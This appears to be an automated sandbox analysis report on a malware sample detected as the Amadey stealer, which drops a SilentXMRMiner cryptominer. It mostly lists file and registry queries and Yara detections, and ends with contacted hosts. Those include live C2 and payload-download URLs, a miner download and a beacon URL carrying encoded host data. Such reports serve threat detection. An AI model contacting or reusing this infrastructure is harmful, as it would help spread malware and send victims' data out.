Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\svchost64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Queries volume information: C:\Windows\System32\Microsoft\Libs\sihost64.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_00C3CB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_00C265B0 LookupAccountNameA,

6_2_00C265B0

Source: C:\Windows\System32\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.960000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.axplong.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.187.100	eijfrhegrtbrfcd.online	United States	13335	CLOUDFLARENETUS	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
140.82.121.3	github.com	United States	36459	GITHUBUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
eijfrhegrtbrfcd.online	172.67.187.100	true
github.com	140.82.121.3	true
sanctam.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://eijfrhegrtbrfcd.online/download/conf1.php	true		unknown
https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0=	false		unknown
https://eijfrhegrtbrfcd.online/download/miner2.0.exe	false		unknown
http://185.215.113.16/Jo89Ku7d/index.php	true	URL Reputation: phishing	unknown
https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip	false		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/Jo89Ku7d/index.php

URL Reputation: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00402559 CryptBinaryToStringA,malloc,CryptBinaryToStringA,		7_2_00402559
Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe	Code function: 7_2_00402607 CryptStringToBinaryA,malloc,CryptStringToBinaryA,free,		7_2_00402607

Bitcoin Miner

Yara detected BitCoin Miner

Source: Yara match	File source: 85.2.miner2.0.exe.347b538.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3434b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3434b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3421e28.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.342b490.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3484bd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.342b490.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.347b538.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3471ed0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 122.2.services64.exe.3421e28.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3484bd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 107.0.svchost64.exe.10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 85.2.miner2.0.exe.3471ed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000006B.00000000.2677511483.0000000000012000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000055.00000002.2682783373.000000000345A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000007A.00000002.2763019419.000000000340A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: miner2.0.exe PID: 5868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 5992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: services64.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost64.exe, type: DROPPED

Yara detected SilentXMRMiner

Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 6772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost64.exe PID: 7732, type: MEMORYSTR

Found strings related to Crypto-Mining

Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: I/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zipp

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.100:443 -> 192.168.2.4:49747 version: TLS 1.2
